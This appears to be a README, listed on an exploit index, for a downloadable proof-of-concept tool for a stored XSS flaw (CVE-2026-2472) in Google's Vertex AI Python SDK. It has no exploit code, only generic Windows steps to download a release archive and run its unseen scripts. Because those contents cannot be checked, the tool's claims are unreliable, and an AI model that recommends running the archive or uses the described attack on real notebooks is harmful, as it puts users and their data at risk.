## https://sploitus.com/exploit?id=F6B2E089-85EC-5902-AF6F-D06BE5F9370F
# 🚨 CVE-2026-2472-Vertex-AI-SDK-Google-Cloud - Simple Proof of Concept Tool
[](https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/releases)
---
## 🛠 About This Application
This tool shows a technical proof of concept (PoC) for the security issue CVE-2026-2472. The issue affects the Vertex AI Python SDK from Google Cloud Platform. It relates to an unauthenticated and stored cross-site scripting (XSS) vulnerability in parts of the SDK used with Jupyter and Colab notebooks.
The software helps you see how this vulnerability can be triggered. It runs on Windows and does not need coding knowledge. You can test this safely on your own system to understand the risk.
---
## 🖥 System Requirements
Before you start, make sure your PC meets the following:
- Windows 10 or newer (64-bit preferred)
- 4 GB RAM minimum, 8 GB or more recommended
- 2 GHz or faster processor
- At least 200 MB of free disk space
- Internet connection to download the files and for initial setup
- Python 3.8 or newer installed (the SDK requires Python)
---
## 📦 What Is Inside This Package?
This download contains:
- Python script files demonstrating the XSS vulnerability in Vertex AI SDK
- Helper files to set up a safe test environment
- Instructions to run the tests on Windows without hacking experience
- Logs and reports to show how the vulnerability works
The scripts simulate how an attacker can inject malicious content into Jupyter or Colab notebook sessions through the SDK.
---
## 🚀 Getting Started
This section guides you step-by-step on how to download, install, and run the software on a Windows PC with no coding experience.
### 1. Visit the Download Page
Click this link or the button above to open the official release page:
https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/releases
### 2. Download the Latest Release
On the release page, find the latest version. It appears as a file archive (usually `.zip`) or a folder containing the files.
Click the file to download it. Save it somewhere easy to find, like your Desktop or Downloads folder.
---
### 3. Extract the Files
Once the download finishes, find the `.zip` or folder on your PC.
- Right-click the `.zip` file
- Choose "Extract All..."
- Select a destination folder that is easy to access, like a new folder on your Desktop
- Click "Extract"
This unpacks the files so you can use them.
---
### 4. Install Python if Needed
This tool uses Python scripts. You need Python 3.8 or later installed.
To check if Python is installed:
- Open the "Start" menu
- Type `cmd` and open the Command Prompt
- Type `python --version` and press Enter
If you see a version number 3.8 or higher, skip this step.
If Python is not installed or the version is older:
- Go to https://www.python.org/downloads/
- Download the latest Python 3 installer for Windows
- Run the installer and **make sure to check "Add Python to PATH" before clicking Install**
- After installation, repeat the version check in Command Prompt
---
### 5. Install Required Python Packages
The scripts need specific Python packages from the Python Package Index (PyPI).
To install them:
- Open Command Prompt again
- Navigate to the folder where you extracted the files by typing `cd path\to\folder` (replace `path\to\folder` with your folder location)
- Run this command:
```
pip install -r requirements.txt
```
This downloads and installs all required libraries the program needs.
---
### 6. Run the Proof of Concept Script
In the Command Prompt, while inside the project folder, run:
```
python main.py
```
This starts the demonstration script.
The script will simulate the vulnerability and show messages that explain what is happening. Follow the instructions on screen to see the test results.
---
## 🔍 How to Use the Software Safely
- Only run this tool on your personal machine or in a secure test environment.
- Do not run this on any live services or networks you do not own.
- Use the outputs only for learning or testing purposes.
- This software does not fix the vulnerability. It only shows how it works.
---
## ➕ Extra Information
### What Is Cross-Site Scripting (XSS)?
XSS is a type of security flaw where an attacker injects bad scripts into websites or applications. The attacker’s code can then run inside your browser or app and cause harm.
This tool shows one way XSS can happen in Google Cloud’s Vertex AI SDK when used in notebooks like Jupyter or Colab.
### Why Does This Matter?
If an attacker uses this vulnerability, they might run harmful scripts without being logged in. It can lead to data theft or other attacks.
This PoC raises awareness so users and developers can better protect their systems.
---
## 📥 Where to Download
Visit the release page here to download the files:
[Download CVE-2026-2472-Vertex-AI-SDK-Google-Cloud](https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/releases)
---
## ℹ️ Topics Covered
- How to trigger XSS attacks in Vertex AI SDK
- Working with Jupyter and Google Colab notebooks
- Testing vulnerability in Python-based AI tools
- Understanding security risks in cloud platforms
---
## 🛡 About the Author
This repository is for research and education on cloud platform security. It targets the issue CVE-2026-2472 affecting Google Cloud Platform’s Vertex AI SDK.
---
## 📧 Support
For questions or issues, use the GitHub Issues page here:
https://github.com/megafart1/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud/issues